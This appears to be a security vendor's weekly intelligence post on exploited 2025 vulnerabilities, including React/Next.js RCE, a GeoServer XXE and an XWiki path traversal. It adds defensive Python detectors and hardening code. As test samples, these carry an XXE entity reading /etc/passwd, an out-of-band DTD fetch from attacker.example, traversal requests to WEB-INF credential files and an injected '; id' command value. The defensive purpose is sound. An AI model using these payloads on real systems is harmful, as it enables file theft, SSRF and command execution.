Exploits, detections, and (much) more for React and Next.js RCE. Exploits and related artifacts for GeoServer, Oracle Identity Manager, XWiki, HexStrike AI MCP Server, and Flowise.

Happy Friday! If you're handling remediation or incident response efforts for this week's React Server Components and Next.js vulnerability, you have our sympathy, along with a slew of detections, queries, and exploit artifacts to aid in testing and defense. The following are the Initial Access Intelligence team's deliverables for the past week. Buckle up!

CVE-2025-55182: React Server Components and Next.js Deserialization RCE

CVE-2025-55182 is a CVSS 10 vulnerability in React Server Components (RSC) and Next.js that was disclosed on December 3, 2025. It is remotely exploitable in default Next.js applications and has driven broad emergency patching and incident response action amid exploitation attempts. The VulnCheck team has produced exploits that deliver an encrypted reverse shell, generic command execution, an in-memory webshell, and an in-memory reverse shell. No target-specific information is necessary for successful exploitation.

The team also delivered ASM queries, a vulnerability check, PCAPs, a test Docker image, and Snort and Suricata rules, all released progressively throughout the week. As of December 5, VulnCheck Canary Intelligence has detected scanning that attempts exploitation (malicious activity, not benign fingerprinting). Our preliminary internet scans indicate a large vulnerable target population. For the latest information and the team's research observations, including RCE attack path analysis, see our emerging threat blog.

CVE-2025-58360: GeoServer XXE Info Disclosure

The team developed an exploit for GeoServer, a popular open-source server for sharing and editing geospatial data. The server's WMS GetMap endpoint fails to disable external entity expansion when parsing SLD/XML supplied in the request, so an attacker-controlled DTD can make the XML parser read local files or issue outbound requests from the server (SSRF). As of December 5, VulnCheck's canary network has detected exploitation of this vulnerability, which has been added to VulnCheck KEV. Our FOFA query shows over 11,000 instances online. The team delivered an exploit, PCAPs, network signatures, a Docker target, version scanners, and ASM queries.
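For defenders who want to triage GetMap traffic themselves, the following is an added example (not GeoServer's code and not the team's exploit) that pulls the inline style out of a GetMap query string, reports any external entity declarations it carries, and shows the parser setting that closes the hole: refusing a DOCTYPE entirely. It assumes the inline style arrives in the WMS SLD_BODY parameter; the three SLD samples are constructed, not captured traffic.

```python
"""Added example: spot XXE in WMS GetMap requests and parse SLD with DTDs refused.
Not GeoServer's code; the SLD_BODY parameter name and the samples are assumptions."""
import re
from urllib.parse import parse_qs, quote
from xml.etree import ElementTree as ET

# Matches <!ENTITY ...> declarations that reference an external resource.
# Both general entities (&name;) and parameter entities (%name;) are caught;
# the latter are the usual vehicle for blind / out-of-band XXE.
_EXT_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.\-]+)\s+
        (?:SYSTEM\s+["'](?P<sys>[^"']*)["']
         |PUBLIC\s+["'][^"']*["']\s+["'](?P<pub>[^"']*)["'])""",
    re.IGNORECASE | re.VERBOSE,
)
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def find_external_entities(xml_text: str) -> list[dict]:
    """List every external entity declared in the document's DTD."""
    return [
        {
            "name": m.group("name"),
            "parameter": m.group("param") is not None,
            "uri": m.group("sys") if m.group("sys") is not None else m.group("pub"),
        }
        for m in _EXT_ENTITY_RE.finditer(xml_text)
    ]


def parse_sld_safely(xml_text: str) -> ET.Element:
    """Parse an SLD document, refusing any DOCTYPE outright.

    A style document has no legitimate need for a DTD, so rejecting the
    DOCTYPE (the approach defusedxml takes) is simpler and safer than trying
    to tell harmless internal entities apart from external ones.
    """
    if _DOCTYPE_RE.search(xml_text):
        raise ValueError("DOCTYPE/DTD not permitted in SLD input")
    return ET.fromstring(xml_text)


def build_getmap_query(sld_body: str) -> str:
    """Assemble a GetMap query string carrying an inline style (used for the samples)."""
    return "SERVICE=WMS&VERSION=1.1.1&REQUEST=GetMap&LAYERS=roads&SLD_BODY=" + quote(sld_body)


def inspect_getmap_query(query_string: str) -> dict:
    """Triage a GetMap query string for XML-borne XXE.

    WMS parameter names are case-insensitive, so keys are lower-cased;
    parse_qs does the URL decoding.
    """
    params = {k.lower(): v for k, v in parse_qs(query_string, keep_blank_values=True).items()}
    body = params.get("sld_body", [""])[0]
    if not body:
        return {"verdict": "no-inline-sld", "entities": []}
    entities = find_external_entities(body)
    if entities:
        # Parameter entities and http(s) targets point at out-of-band
        # exfiltration or SSRF; plain file: entities are local file reads.
        kinds = {
            "oob" if e["parameter"] or e["uri"].lower().startswith("http") else "file-read"
            for e in entities
        }
        return {"verdict": "xxe", "kinds": sorted(kinds), "entities": entities}
    if _DOCTYPE_RE.search(body):
        return {"verdict": "suspicious-dtd", "entities": []}
    return {"verdict": "clean", "entities": []}


# Constructed samples, not captured traffic.
BENIGN_SLD = (
    '<StyledLayerDescriptor version="1.0.0">'
    "<NamedLayer><Name>roads</Name></NamedLayer></StyledLayerDescriptor>"
)
FILE_READ_SLD = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE sld [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<StyledLayerDescriptor><NamedLayer><Name>&xxe;</Name></NamedLayer>"
    "</StyledLayerDescriptor>"
)
OOB_SLD = (
    '<!DOCTYPE sld [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>'
    "<StyledLayerDescriptor/>"
)

if __name__ == "__main__":
    for label, sld in [("benign", BENIGN_SLD), ("file-read", FILE_READ_SLD), ("oob", OOB_SLD)]:
        print(label, inspect_getmap_query(build_getmap_query(sld)))
```

The detector is deliberately a DTD inspector rather than a signature on a known payload: the file-read and out-of-band variants differ only in the entity kind and URI scheme, and both are caught by the same declaration match. The same regex is a reasonable starting point for a proxy or WAF rule on decoded SLD_BODY values.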

CVE-2025-61757: Oracle Identity Manager Auth Bypass and RCE

Hot on the heels of last week's ASM and query coverage for Oracle Identity Manager CVE-2025-61757, the team added an exploit, PCAP, and network signature updates. Customers now have access to the exploit, two PCAPs, improved network signatures, and ASM queries for this exploited-in-the-wild Oracle vulnerability.

CVE-2025-55748: XWiki Information Disclosure (Path Traversal)

More XWiki content! Today we added coverage for XWiki CVE-2025-55748, a parameter-based path traversal that lets an unauthenticated attacker read any file under the application root. Notably, ../../WEB-INF/xwiki.cfg holds the application's configured credentials (if any are set) and ../../WEB-INF/hibernate.cfg.xml holds the database connection credentials.

We have added an exploit, version scanner, PCAP, network signatures, a Docker target, and ASM queries in this release. FOFA reports several thousand XWiki deployments online. CrowdSec has been tracking exploitation in the wild since October 29, 2025.
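The two sides of this bug class, as an added example that is not XWiki's code: a path-confinement check that keeps a caller-supplied file name inside the directory an endpoint is meant to serve (refusing WEB-INF and META-INF even when they sit under the application root, since the servlet container's URL-level protection does not apply to code that opens files by path), and a log sweep that flags traversal attempts, including double-encoded ones. The deployment path, the endpoint and the "file" parameter in the constructed log lines are placeholders, not XWiki's real layout.

```python
"""Added example: confine a caller-supplied file path to its intended directory
and flag traversal attempts in access logs. Not XWiki's code; the deployment
path, endpoint and parameter name in the samples are placeholders."""
import posixpath
import re
from urllib.parse import unquote

# Hypothetical layout: the application root and the one directory the
# endpoint is meant to serve files from (two levels down, so "../../" lands
# on the root, as in the advisory's WEB-INF paths).
APP_ROOT = "/opt/xwiki/webapps/xwiki"
SERVED_DIR = APP_ROOT + "/resources/skins"
# Even inside the application root these must never be served: the servlet
# container hides them from URL requests, but code that opens files by path
# bypasses that protection, which is the whole bug class here.
FORBIDDEN_SEGMENTS = {"WEB-INF", "META-INF"}


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (..%252F.. only becomes ../ on the second pass)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_join(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir, or raise ValueError if it would escape."""
    decoded = fully_decode(user_path).replace("\\", "/")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Treat the input as relative however it was spelled, normalise away any
    # ".." segments, then require the result to sit below the base directory.
    candidate = posixpath.normpath(posixpath.join(base_dir, decoded.lstrip("/")))
    base = base_dir.rstrip("/")
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError(f"path escapes served directory: {user_path!r}")
    if FORBIDDEN_SEGMENTS & set(candidate.split("/")):
        raise ValueError(f"refusing protected path: {user_path!r}")
    return candidate


_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)
# A ".." segment at the start of a value or after a path/query delimiter.
_DOTDOT_RE = re.compile(r"(?<![^/\\=&?])\.\.(?=[/\\]|$)")


def traversal_hits(log_text: str) -> list[dict]:
    """Flag requests whose fully decoded target contains '..' segments or a protected directory."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        target = fully_decode(m.group("target")).replace("\\", "/")
        reasons = []
        if _DOTDOT_RE.search(target):
            reasons.append("dot-dot segment")
        if any(seg in FORBIDDEN_SEGMENTS for seg in re.split(r"[/?=&]", target)):
            reasons.append("protected directory")
        if reasons:
            hits.append({"ip": m.group("ip"), "status": int(m.group("status")),
                         "target": target, "reasons": reasons})
    return hits


# Constructed access-log lines (Common Log Format); the endpoint and the
# "file" parameter are placeholders, not XWiki's real URL or parameter.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Oct/2025:10:12:01 +0000] "GET /xwiki/resources/skins/flamingo/style.css HTTP/1.1" 200 4821
203.0.113.9 - - [29/Oct/2025:10:12:07 +0000] "GET /xwiki/example-endpoint?file=../../WEB-INF/xwiki.cfg HTTP/1.1" 200 9130
203.0.113.9 - - [29/Oct/2025:10:12:09 +0000] "GET /xwiki/example-endpoint?file=..%252f..%252fWEB-INF%252fhibernate.cfg.xml HTTP/1.1" 200 2210
198.51.100.7 - - [29/Oct/2025:10:13:00 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 15300
"""

if __name__ == "__main__":
    print(safe_join(SERVED_DIR, "flamingo/style.css"))
    for hit in traversal_hits(SAMPLE_LOG):
        print(hit)
```

When sweeping logs, a 200 status on a flagged request is the line to escalate: it means the file was served, and with xwiki.cfg or hibernate.cfg.xml in the target, the credentials in those files should be treated as exposed.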

CVE-2025-35028: HexStrike AI MCP Server RCE

The team developed an exploit for HexStrike AI MCP Server, which exposes vulnerability-testing tooling to AI agents over MCP. The application provides no authentication and performs no meaningful validation of the parameters passed to its tools, leaving many paths to unauthenticated remote code execution. At the time of writing the project has not been updated and remains vulnerable. It has more than 4,900 GitHub stars and a fairly active issues page. The team has provided an exploit, network signatures, version scanners, PCAPs, and a Docker target.

CVE-2025-8943: Flowise Custom MCP RCE

Another day, another Flowise exploit! This week the team targeted the Flowise Custom MCP functionality in versions ≤ 3.0.0, which did not validate requests to create new MCP tools, allowing an unauthenticated attacker to register tools containing malicious commands and achieve remote code execution. Exploitation was observed in VulnCheck canary data, and the vulnerability was added to VulnCheck KEV on November 27. The team delivered an exploit, PCAPs, network signatures, a Docker target, version scanners, and ASM queries.
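The HexStrike AI and Flowise items above are the same two mistakes in different servers: tool parameters handed to a shell unchecked, and tool definitions accepted from anyone. The following added example (illustrative, not either project's code) puts both patterns beside a hardened equivalent: a bearer-token check, a closed catalog of permitted binaries, a grammar per parameter, and argv lists that never touch a shell. The catalog, the parameter grammars and the placeholder token are assumptions.

```python
"""Added example: unauthenticated tool creation and unchecked tool parameters
next to a hardened equivalent. Illustrative, not the HexStrike AI or Flowise
code; the tool catalog, token and parameter grammars are assumptions."""
import hmac
import re
from typing import Any

# ---- the pattern the advisories describe -------------------------------------

def build_command_unsafely(tool: str, params: dict[str, str]) -> str:
    """Caller-controlled fields land in one shell string; anything after a
    metacharacter in 'target' runs as a second command."""
    return f"{tool} {params.get('target', '')}"


def create_tool_unsafely(registry: dict[str, dict], definition: dict) -> dict:
    """Registers whatever command the caller supplies, with no auth check."""
    registry[definition["name"]] = definition
    return {"status": 201, "tool": definition["name"]}


# ---- hardened equivalent -----------------------------------------------------

# Closed catalog of binaries a tool may invoke and the parameters each accepts:
# name -> (grammar, flag placed before the value, or None for positional).
TOOL_CATALOG: dict[str, dict[str, Any]] = {
    "nmap": {"binary": "nmap", "params": {"ports": ("portlist", "-p"), "target": ("host", None)}},
    "whois": {"binary": "whois", "params": {"target": ("host", None)}},
}
# Each grammar says what a value may look like. No blocklist of shell
# characters is needed because argv lists never reach a shell anyway.
PARAM_GRAMMARS = {
    "host": re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9-]{1,63}$"),
    "portlist": re.compile(r"^\d{1,5}(?:[,-]\d{1,5})*$"),
}
TOOL_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
API_TOKEN = "replace-me-load-from-a-secret-store"  # placeholder value


def authorize(headers: dict[str, str]) -> bool:
    """Bearer-token check using a constant-time comparison."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    return scheme == "Bearer" and hmac.compare_digest(token.encode(), API_TOKEN.encode())


def build_command(tool: str, params: dict[str, str]) -> list[str]:
    """Return an argv list (never a shell string) after validating every parameter."""
    spec = TOOL_CATALOG.get(tool)
    if spec is None:
        raise ValueError(f"unknown tool {tool!r}")
    unexpected = set(params) - set(spec["params"])
    if unexpected:
        raise ValueError(f"unexpected parameters: {sorted(unexpected)}")
    if "target" not in params:
        raise ValueError("target is required")
    argv = [spec["binary"]]
    for name, (grammar, flag) in spec["params"].items():
        value = params.get(name)
        if value is None:
            continue
        if not PARAM_GRAMMARS[grammar].fullmatch(value):
            raise ValueError(f"parameter {name!r} failed {grammar} validation")
        argv += [flag, value] if flag else [value]
    return argv


def create_tool(registry: dict[str, dict], headers: dict[str, str], definition: dict) -> dict:
    """Authenticated tool registration that only accepts catalogued commands."""
    if not authorize(headers):
        return {"status": 401, "error": "authentication required"}
    name, command = definition.get("name", ""), definition.get("command", "")
    if not TOOL_NAME_RE.fullmatch(name):
        return {"status": 400, "error": "invalid tool name"}
    if command not in TOOL_CATALOG:
        return {"status": 400, "error": "command not in allowlist"}
    registry[name] = {"command": command}
    return {"status": 201, "tool": name}


if __name__ == "__main__":
    print(build_command_unsafely("nmap", {"target": "example.com; id"}))
    print(build_command("nmap", {"target": "example.com", "ports": "80,443"}))
```

The argv list from build_command is what would be passed to subprocess.run without shell=True; the important property is that the validated value is a single argument, so "example.com; id" is rejected by the grammar rather than relying on quoting. The same catalog doubles as the allowlist for tool creation, which is what stops a caller from registering a tool whose "command" is an arbitrary shell line.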